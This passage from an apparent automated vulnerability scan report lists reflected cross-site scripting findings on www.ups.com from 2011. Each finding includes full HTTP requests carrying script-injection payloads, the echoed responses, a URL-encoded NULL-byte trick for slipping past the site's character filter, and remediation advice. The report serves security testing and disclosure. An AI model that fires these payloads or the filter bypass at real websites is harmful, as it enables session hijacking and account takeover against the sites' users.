Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /cva940e5"%20a%3db%2097335661a92 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:29 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44421


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="https://www.ups.com/cva940e5" a=b 97335661a92?appid=CVA">
...[SNIP]...

1.134. https://www.ups.com/cva [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /cva

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %0094092'-alert(1)-'0ff48cd0011 was submitted in the loc parameter. This input was echoed as 94092'-alert(1)-'0ff48cd0011 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /cva?loc=en_US%0094092'-alert(1)-'0ff48cd0011&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:14 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 14513


<!-- SearchBodyStart -->


<!--
Content Name: LoginCustomForSSO.jsp
-->

<!-- Begin include -->


<body onload="document.LoginPage.elements['bean.uid'].focus()"/>


<S
...[SNIP]...
d0011&appid=CVA';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + '/myups/info/home?loc=en_US_94092'-alert(1)-'0ff48cd0011&appid=CVA';
}
else
{

//actionUrl = ssoLoginUrl + "0" + "&returnto=" + '/myups/info/home?loc=en_US_94092'-alert(1)-'0ff48cd0011&appid=CVA';
actionUrl = "/one-to-on
...[SNIP]...

1.135. https://www.ups.com/cva [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /cva

Issue detail

The value of the loc request parameter is copied into a JavaScript rest-of-line comment. The payload %001aca2</script><script>alert(1)</script>0fa99372be7 was submitted in the loc parameter. This input was echoed as 1aca2</script><script>alert(1)</script>0fa99372be7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /cva?loc=en_US%001aca2</script><script>alert(1)</script>0fa99372be7&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:20 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15339


<!-- SearchBodyStart -->


<!--
Content Name: LoginCustomForSSO.jsp
-->

<!-- Begin include -->


<body onload="document.LoginPage.elements['bean.uid'].focus()"/>


<S
...[SNIP]...
"";
theForm.elements['uid'].value=uidField;

if (theForm.elements['bean.autopop'].checked)
{

//actionUrl = ssoLoginUrl + "1" + "&returnto=" + '/myups/info/home?loc=en_US_1aca2</script><script>alert(1)</script>0fa99372be7&appid=CVA';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + '/myups/info/home?loc=en_US_1aca2
...[SNIP]...

1.136. https://www.ups.com/cva [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /cva

Issue detail

The value of the loc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00cd6da"><script>alert(1)</script>ed89f360e04 was submitted in the loc parameter. This input was echoed as cd6da"><script>alert(1)</script>ed89f360e04 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /cva?loc=en_US%00cd6da"><script>alert(1)</script>ed89f360e04&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:11 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15218


<!-- SearchBodyStart -->


<!--
Content Name: LoginCustomForSSO.jsp
-->

<!-- Begin include -->


<body onload="document.LoginPage.elements['bean.uid'].focus()"/>


<S
...[SNIP]...
<a href="/myups/forgotpassword?loc=en_US_cd6da"><script>alert(1)</script>ed89f360e04&returnto=%2Fmyups%2Ffinishlogin%3Floc%3Den_US_cd6da%26quot%3B%26gt%3B%26lt%3Bscript%26gt%3Balert%281%29%26lt%3B%2Fscript%26gt%3Bed89f360e04%26amp%3Bauto%3D0%26amp%3Breturnto%3D%2Fmyups%2Finfo%2Fhome%3
...[SNIP]...

1.137. https://www.ups.com/myWorkspace/home [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /myWorkspace/home

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aed41"%20a%3db%20e2142496064 was submitted in the REST URL parameter 2. This input was echoed as aed41" a=b e2142496064 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /myWorkspace/homeaed41"%20a%3db%20e2142496064 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:28 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44485


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="https://www.ups.com/myWorkspace/homeaed41" a=b e2142496064">
...[SNIP]...

1.138. https://www.ups.com/myWorkspace/home [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /myWorkspace/home

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript rest-of-line comment. The payload dd611%0a13f21f4da2b was submitted in the REST URL parameter 2. This input was echoed as dd611, a literal line break, and then 13f21f4da2b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /myWorkspace/homedd611%0a13f21f4da2b HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:34 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44384


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
theForm.elements['uid'].value=uidField;

if (theForm.elements['bean.autopop'].checked)
{

//actionUrl = ssoLoginUrl + "1" + "&returnto=" + 'https://www.ups.com/myWorkspace/homedd611
13f21f4da2b
';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/myWorkspace/homedd611

...[SNIP]...

1.139. https://www.ups.com/myWorkspace/home [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /myWorkspace/home

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d9f22'%3b5a005591ca8 was submitted in the REST URL parameter 2. This input was echoed as d9f22';5a005591ca8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /myWorkspace/homed9f22'%3b5a005591ca8 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:31 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44401


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
591ca8';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/myWorkspace/homed9f22';5a005591ca8';
}
else
{

//actionUrl = ssoLoginUrl + "0" + "&returnto=" + 'https://www.ups.com/myWorkspace/homed9f22';5a005591ca8';
actionUrl = "/one-to-one/login?ID=100&loc="
...[SNIP]...

1.140. https://www.ups.com/myWorkspace/home [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /myWorkspace/home

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %003b705'-alert(1)-'675be0e7959 was submitted in the loc parameter. This input was echoed as 3b705'-alert(1)-'675be0e7959 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /myWorkspace/home?loc=en_US%003b705'-alert(1)-'675be0e7959&WT.svl=PriNav HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:12 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 14391


<!-- SearchBodyStart -->


<!--
Content Name: LoginCustomForSSO.jsp
-->

<!-- Begin include -->


<body onload="document.LoginPage.elements['bean.uid'].focus()"/>


<S
...[SNIP]...
1)-'675be0e7959';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + '/myups/info/home?loc=en_US_3b705'-alert(1)-'675be0e7959';
}
else
{

//actionUrl = ssoLoginUrl + "0" + "&returnto=" + '/myups/info/home?loc=en_US_3b705'-alert(1)-'675be0e7959';
actionUrl = "/one-to-one/login?ID=100&loc="
...[SNIP]...

1.141. https://www.ups.com/myWorkspace/home [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /myWorkspace/home

Issue detail

The value of the loc request parameter is copied into a JavaScript rest-of-line comment. The payload %007d10a</script><script>alert(1)</script>21c1fea2813 was submitted in the loc parameter. This input was echoed as 7d10a</script><script>alert(1)</script>21c1fea2813 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /myWorkspace/home?loc=en_US%007d10a</script><script>alert(1)</script>21c1fea2813&WT.svl=PriNav HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:18 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15217


<!-- SearchBodyStart -->


<!--
Content Name: LoginCustomForSSO.jsp
-->

<!-- Begin include -->


<body onload="document.LoginPage.elements['bean.uid'].focus()"/>


<S
...[SNIP]...
"";
theForm.elements['uid'].value=uidField;

if (theForm.elements['bean.autopop'].checked)
{

//actionUrl = ssoLoginUrl + "1" + "&returnto=" + '/myups/info/home?loc=en_US_7d10a</script><script>alert(1)</script>21c1fea2813';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + '/myups/info/home?loc=en_US_7d10a</script>
...[SNIP]...

1.142. https://www.ups.com/myWorkspace/home [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /myWorkspace/home

Issue detail

The value of the loc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %004df24"><script>alert(1)</script>e2b70b6725a was submitted in the loc parameter. This input was echoed as 4df24"><script>alert(1)</script>e2b70b6725a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /myWorkspace/home?loc=en_US%004df24"><script>alert(1)</script>e2b70b6725a&WT.svl=PriNav HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:09 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15096


<!-- SearchBodyStart -->


<!--
Content Name: LoginCustomForSSO.jsp
-->

<!-- Begin include -->


<body onload="document.LoginPage.elements['bean.uid'].focus()"/>


<S
...[SNIP]...
<a href="/myups/forgotpassword?loc=en_US_4df24"><script>alert(1)</script>e2b70b6725a&returnto=%2Fmyups%2Ffinishlogin%3Floc%3Den_US_4df24%26quot%3B%26gt%3B%26lt%3Bscript%26gt%3Balert%281%29%26lt%3B%2Fscript%26gt%3Be2b70b6725a%26amp%3Bauto%3D0%26amp%3Breturnto%3D%2Fmyups%2Finfo%2Fhome%3
...[SNIP]...

1.143. https://www.ups.com/myWorkspace/wspref [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /myWorkspace/wspref

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 482d2"%20a%3db%2082ed3444b68 was submitted in the REST URL parameter 2. This input was echoed as 482d2" a=b 82ed3444b68 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /myWorkspace/wspref482d2"%20a%3db%2082ed3444b68 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:26 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44507


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="https://www.ups.com/myWorkspace/wspref482d2" a=b 82ed3444b68">
...[SNIP]...

1.144. https://www.ups.com/myWorkspace/wspref [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /myWorkspace/wspref

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript rest-of-line comment. The payload 82b5e%0a3c917cf9f81 was submitted in the REST URL parameter 2. This input was echoed as 82b5e, a literal line break, and then 3c917cf9f81 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /myWorkspace/wspref82b5e%0a3c917cf9f81 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:31 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44406


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
eForm.elements['uid'].value=uidField;

if (theForm.elements['bean.autopop'].checked)
{

//actionUrl = ssoLoginUrl + "1" + "&returnto=" + 'https://www.ups.com/myWorkspace/wspref82b5e
3c917cf9f81
';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/myWorkspace/wspref82b5
...[SNIP]...

1.145. https://www.ups.com/myWorkspace/wspref [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /myWorkspace/wspref

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload faefa'%3b3a06bbe69ac was submitted in the REST URL parameter 2. This input was echoed as faefa';3a06bbe69ac in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /myWorkspace/wspreffaefa'%3b3a06bbe69ac HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:29 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44423


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
69ac';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/myWorkspace/wspreffaefa';3a06bbe69ac';
}
else
{

//actionUrl = ssoLoginUrl + "0" + "&returnto=" + 'https://www.ups.com/myWorkspace/wspreffaefa';3a06bbe69ac';
actionUrl = "/one-to-one/login?ID=100&loc=
...[SNIP]...

1.146. https://www.ups.com/myWorkspace/wspref [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /myWorkspace/wspref

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %0010244'-alert(1)-'35d1037df28 was submitted in the loc parameter. This input was echoed as 10244'-alert(1)-'35d1037df28 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /myWorkspace/wspref?loc=en_US%0010244'-alert(1)-'35d1037df28&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:12 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 14391


<!-- SearchBodyStart -->


<!--
Content Name: LoginCustomForSSO.jsp
-->

<!-- Begin include -->


<body onload="document.LoginPage.elements['bean.uid'].focus()"/>


<S
...[SNIP]...
1)-'35d1037df28';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + '/myups/info/home?loc=en_US_10244'-alert(1)-'35d1037df28';
}
else
{

